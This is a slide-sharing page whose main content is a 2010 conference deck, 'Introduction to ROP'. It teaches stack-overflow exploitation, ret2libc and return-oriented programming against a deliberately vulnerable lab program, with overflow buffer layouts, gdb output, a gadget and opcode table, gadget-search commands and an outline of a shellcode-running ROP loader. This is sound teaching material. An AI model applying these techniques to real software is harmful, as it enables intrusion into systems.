Unveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkUnveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkSaumil Shah
 
Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Saumil Shah
 
Precise Presentations
Precise PresentationsPrecise Presentations
Precise PresentationsSaumil Shah
 
Effective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceEffective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceSaumil Shah
 
INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020Saumil Shah
 
Cyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadCyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadSaumil Shah
 
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceCybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceSaumil Shah
 
NSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadNSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadSaumil Shah
 
Cybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadCybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadSaumil Shah
 
INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019Saumil Shah
 
Introducing ARM-X
Introducing ARM-XIntroducing ARM-X
Introducing ARM-XSaumil Shah
 
The Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDThe Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDSaumil Shah
 
The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019Saumil Shah
 
The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019Saumil Shah
 
Schrödinger's ARM Assembly
Schrödinger's ARM AssemblySchrödinger's ARM Assembly
Schrödinger's ARM AssemblySaumil Shah
 
ARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMSARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMSSaumil Shah
 
What Makes a Compelling Photograph
What Makes a Compelling PhotographWhat Makes a Compelling Photograph
What Makes a Compelling PhotographSaumil Shah
 
Make ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKMake ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKSaumil Shah
 

Plus de Saumil Shah (20)

The Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksThe Hand That Strikes, Also Blocks
The Hand That Strikes, Also Blocks
 
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSDebugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
 
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkUnveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
 
Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332
 
Precise Presentations
Precise PresentationsPrecise Presentations
Precise Presentations
 
Effective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceEffective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual Audience
 
INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020
 
Cyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadCyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade Ahead
 
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceCybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
 
NSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadNSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade Ahead
 
Cybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadCybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade Ahead
 
INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019
 
Introducing ARM-X
Introducing ARM-XIntroducing ARM-X
Introducing ARM-X
 
The Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDThe Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBD
 
The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019
 
The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019
 
Schrödinger's ARM Assembly
Schrödinger's ARM AssemblySchrödinger's ARM Assembly
Schrödinger's ARM Assembly
 
ARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMSARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMS
 
What Makes a Compelling Photograph
What Makes a Compelling PhotographWhat Makes a Compelling Photograph
What Makes a Compelling Photograph
 
Make ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKMake ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEK
 

Dernier

Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfRankYa
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 

Dernier (20)

Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdf
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 

An introduction to ROP

  • 1. net-square Introduction to ROP a first look at return oriented programming Saumil Shah, Net-Square Hack.LU 2010 - Luxembourg
  • 2. net-square Introduction • DEP • EIP control • Ret2LibC • Return Oriented Programming
  • 3. net-square DEP • Hardware enforced (NX). • Data areas marked non-executable. – Stack marked non-executable. – Heap marked non-executable. • You can load your shellcode in the stack or the heap... • ...but you can't jump to it.
  • 4. net-square EIP control • Stack - forbidden • Heap - forbidden • Binary - OK • DLLs - OK Program Image Heap Stack DLL DLL DLL
  • 5. net-square Ret2LibC • Return to LibC. • Pioneered by Solar Designer in 1997. • EIP made to "return to a function". • Need control of the stack memory. – We usually have it.
  • 6. net-square Ret2LibC - how does it work? • Create a fake frame on the stack. • After an overflowed function returns... • ...set the EIP return address to the new function. • Append the fake frame. • New function executes. – parameters consumed from the fake frame. • system("/bin/sh")
  • 7. net-square Return Oriented Programming • Series of function returns. • Chained frames. • Transform EIP based primitives into stubs that can be "returned into". • ESP is the new EIP!
  • 8. net-square Topics • Function calls and returns • Stack overflows revisited • Creating stack frames • Chaining frames • ESP control
  • 9. net-square Calling a function • Add two ints x, y. • add(3,4) • What does the calling frame look like? void add(int x, int y) { int sum; sum = x + y; printf("%dn", sum); } int main() { add(3, 4); }
  • 10. net-square Stack frame for add(3,4) frame for add() return address from add() 3 4 call add
  • 11. net-square Return from add(3,4) • add() is about to return. • RET after epilogue of add(). • Where does ESP point to? – immediately before the RET • What does the stack look like?
  • 12. net-square Before the RET return address from add() 3 4 ESP
  • 13. net-square Another function • Stack overflow in func1. • Can we call add(5, 6) after returning from func1? void func1(char *s) { char buffer[128]; strcpy(buffer, s); } int main() { func1(argv[1]); }
  • 14. net-square Stack frame for func1() buffer return address from func1 s
  • 15. net-square strcpy(buffer, s) buffer return address from func1 s AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAA AAAA AAAA AAAA
  • 16. net-square Before the RET buffer return address from func1 s AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAA AAAA AAAA AAAA ESP
  • 17. net-square After the RET buffer return address from func1 s AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAA AAAA AAAA AAAA EIP = 0x41414141 ESP
  • 18. net-square Return to add() • Insert a fake frame in the buffer. • Make func1() return to: add(01010101, 02020202) • What does the stack frame look like?
  • 19. net-square strcpy(buffer, s) buffer return address from func1 s AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA address of add return address from add 01010101 02020202
  • 20. net-square Before func1() returns buffer return address from func1 s AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA address of add return address from add 01010101 02020202 ESP
  • 21. net-square Return to add() buffer return address from func1 s AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA address of add return address from add 01010101 02020202 ESP EIP = add()
  • 22. net-square Return to add() • By carefully creating a frame... • ...we can make the program "return to our function". • We control the parameters. • We also control where to jump to after our function returns.
  • 23. net-square victim2.c int main(int argc, char *argv[]) { add(3, 4); func1(argv[1]); } void func1(char *s) { char buffer[128]; strcpy(buffer, s); } void print_hello(void) { printf("Hello Worldn"); } void add(int x, int y) { int sum; sum = x + y; printf("%d + %d = %dn", x, y, sum); } stack overflow lurks here!
  • 24. net-square victim2.c • Compile victim2.c • Run victim2 under a debugger • Study the stack frame before add(3, 4) gcc victim2.c -o victim2 gdb victim2
  • 25. net-square gdb'ing add • Set a breakpoint before add(3, 4) 0x804836c <main>: push %ebp 0x804836d <main+1>: mov %esp,%ebp 0x804836f <main+3>: sub $0x8,%esp 0x8048372 <main+6>: and $0xfffffff0,%esp 0x8048375 <main+9>: mov $0x0,%eax 0x804837a <main+14>: sub %eax,%esp 0x804837c <main+16>: sub $0x8,%esp 0x804837f <main+19>: push $0x4 0x8048381 <main+21>: push $0x3 0x8048383 <main+23>: call 0x80483de <add> 0x8048388 <main+28>: add $0x10,%esp 0x804838b <main+31>: cmpl $0x1,0x8(%ebp)
  • 26. net-square Stack frame before add(3, 4) • Dump the stack • Continue (gdb) x/64 $esp 0xbffff8ac: 0x08048388 0x00000003 0x00000004 0xbffff8c8 0xbffff8bc: 0x0804841c 0x40148f50 0x40012780 0xbffff8e8 0x08048388 3 4
  • 27. net-square Overflowing func1() • Overflow func1 and... ...return to add(01010101, 02020202) • Create a fake frame. • Overwrite stack. • frame1.pl return from func1 param1 param2 return from add 0x080483de 0x01010101 0x02020202 0x42424242
  • 28. net-square frame1.pl • Creates the overflow buffer as follows: • Set this in an environment variable EGG and run victim2 with $EGG: 080483deAAAAAA...140...AAAAAA 42424242 01010101 02020202 distance to EIP address of add return from add param1 param2 export EGG=`./frame1.pl` gdb victim2 (gdb) run $EGG
  • 29. net-square ESP • Where will ESP be after returning from add? • Verify 080483deAAAAAA...140...AAAAAA 42424242 01010101 02020202 (gdb) x/64 $esp 0xbffff824: 0x01010101 0x02020202 0x08048400 0x40148f50 0xbffff834: 0x40012780 0xbffff858 0x4002e7f7 0x00000002 ESP
  • 30. net-square Chaining functions • After add(01010101, 02020202), we want to run add(03030303, 04040404). • How should we set up the frames? • First, study the frame after add() returns.
  • 32. net-square Where does the new frame go? AAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAA address of add 42424242 01010101 02020202 address of add ?? 03030303 04040404
  • 33. net-square Where does the new frame go? • We get only ONE chance at strcpy. • How do we preserve params 01010101 and 02020202? • We can only APPEND the second frame below our first frame. • We have to UNWIND the first frame before returning to the second frame. • Return to epilogue!
  • 34. net-square Chaining the frames AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA address of add address of POP/POP/RET 01010101 02020202 address of add 42424242 03030303 04040404 add(01010101, 02020202) add(03030303, 04040404)
  • 35. net-square Keeping ESP in control AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA address of add address of POP/POP/RET 01010101 02020202 address of add 42424242 03030303 04040404 Return from func1 Return to add() Return to POP/POP/RET POP POP ESP RET - Return to add() Finally EIP = 0x42424242
  • 36. net-square frame2.pl • Creates the overflow buffer as follows: 080483deAAAAAA...140...AAAAAA 0804843d 01010101 02020202 distance to EIP address of add POP/POP /RET param1 param2 080483de 42424242 03030303 04040404 address of add return from add param1 param2 Use msfelfscan to find the address of POP/POP/RET from victim2 binary.
  • 37. net-square frame2.pl • Set this in an environment variable EGG and run victim2 with $EGG: export EGG=`./frame2.pl` gdb victim2 (gdb) run $EGG Starting program: /home/user0/victim2 $EGG 3 + 4 = 7 1010101 + 2020202 = 3030303 3030303 + 4040404 = 7070707 Program received signal SIGSEGV, Segmentation fault. 0x42424242 in ?? ()
  • 38. net-square It's all about ESP! • ESP is the new EIP. • ROP involves keeping the ESP moving through the frames on the stack. • Frames can be chained by returning to epilogues of functions. – to appropriately unwind the parameters pushed on the stack. • We must never lose sight of RET.
  • 39. net-square ROP frames - generic approach f1(A, B) f2(X) f1(C, D) f3(P, Q, R, S) f2(Y) : : & f1() & POP/POP/RET A B & f2() & POP/RET X & f3() & POPAD/RET P Q R & f1() & POP/POP/RET C D junk junk junk & f2() & POP/RET Y S
  • 40. net-square Topics • Transforming classic EIP code to ROP • ROP vs. classic programming • Thinking in ROP terms • Assembling frames • Gadgets • Searching for gadgets • Generic techniques
  • 41. net-square EIP vs. ESP Classic EIP code • N ops = N instructions. • EIP increments. • ESP fluctuates. • The CPU increments EIP automatically. ROP code • N ops = N frames. • ESP increments. • EIP fluctuates. • We have to control ESP through RET instructions.
  • 42. net-square Transform EIP code to ROP • Load two registers • Call a function – with params 3,4 • How does this translate in ROP terms? mov eax, 14 mov ecx, 02500000 push 3 push 4 call 77fe3210
  • 43. net-square Thinking in ROP terms ?? AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA 14 ESP Put 14 in the next stack word, and POP it into EAX. RET function body epilogue prologue vulnerable function EIP mov eax, 14 RET POP EAX POP EBX functionX 700344fe 700344fd 700344ff
  • 44. net-square Thinking in ROP terms 700344fe AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA 14ESP RET function body epilogue prologue vulnerable function EIP Jump to address of "POP EAX; RET". Search function epilogues. RET POP EAX POP EBX functionX mov eax, 14
  • 45. net-square Thinking in ROP terms 700344fe ?? AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA 14 02500000 ESP RET function body epilogue prologue vulnerable function EIP Place 02500000 as the next stack word, to be loaded into ECX. RET POP EAX POP EBX functionX eax = 00000014 mov ecx, 02500000
  • 46. net-square Thinking in ROP terms 700344fe 6d894430 AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA 14 02500000 RET function body epilogue prologue vulnerable function We now need an address of a "POP ECX; RET" sequence. RET POP EAX POP EBX functionX RET POP ECX functionY ESP EIP eax = 00000014 mov ecx, 02500000 6d894430 6d894431
  • 47. net-square Thinking in ROP terms 700344fe 6d894430 AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA 14 02500000ESP RET function body epilogue prologue vulnerable function 02500000 is popped into ECX. RET POP EAX POP EBX functionX EIP RET POP ECX functionY eax = 00000014 mov ecx, 02500000
  • 48. net-square Thinking in ROP terms 700344fe 6d894430 AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA 14 02500000 ??ESP RET function body epilogue prologue vulnerable function We now need to call a function at 77fe3210, with parameters 3, 4 RET POP EAX POP EBX functionX EIP RET POP ECX functionY push 3; push 4; call 77fe3210 eax = 00000014 ecx = 02500000
  • 49. net-square Gadget Dictionary POP EAX; RET Load value into register value POP ECX; RET Read memory at address address ADD EAX,n; RET Add MOV EAX,[ECX]; RET POP EAX; RET Write value at address address POP ECX; RET value MOV [EAX],ECX; RET INC EAX; RET Increment address of function Call a function param cleanup param 1 param 2 RET NOP param N POP; POP ... RET ADD ESP,24; RET POPAD; RET POP EAX; RET Call a function pointer address CALL [EAX]; RET XCHG EAX,ESP; RET Stack flip ESP=EAX LEAVE; RET Stack flip ESP=EBP POP ESP; RET Stack flip ESP=addr address
  • 50. net-square Instruction Opcodes Instruction Opcodes RET C3 RET n C2 16bits POP EAX 58 POP ECX 59 MOV EAX,[ECX] 8B 01 MOV [EAX],ECX 89 08 MOV [ECX],EAX 89 01 INC EAX 40 ADD EAX, n 83 C0 8bits
  • 51. net-square Instruction Opcodes Instruction Opcodes POP EBX/EDX/ESI/EDI/EBP 5B/5A/5E/5F/5D POPAD 61 ADD ESP,24 83 C4 18 CALL [EAX] FF 10 XCHG EAX,ESP 94 LEAVE C9 (mov esp,ebp; pop ebp) POP ESP 5C
  • 52. net-square Searching for Gadgets • Use msfpescan's regex search. • Example: MOV EAX,[ECX]; RET msfpescan -D -r 'x8Bx01xC3' <file> msfpescan -D -r 'x8Bx01xC2.x00' <file> msfpescan -D -r 'x8Bx01.xC3' <file> msfpescan -D -r 'x8Bx01..xC3' <file> • Sometimes you may need to improvise.
  • 53. net-square Generic Techniques • Run arbitrary shellcode. • Difficult to transform entire shellcode to ROP frames. • Create a ROP loader: – Allocate RWX memory – Copy classic shellcode to this memory – Jump to shellcode • Load and run any shellcode.
  • 54. net-square DEMO TIME! • Java JNLP docbase overflow • Exploiting IE8 using ROP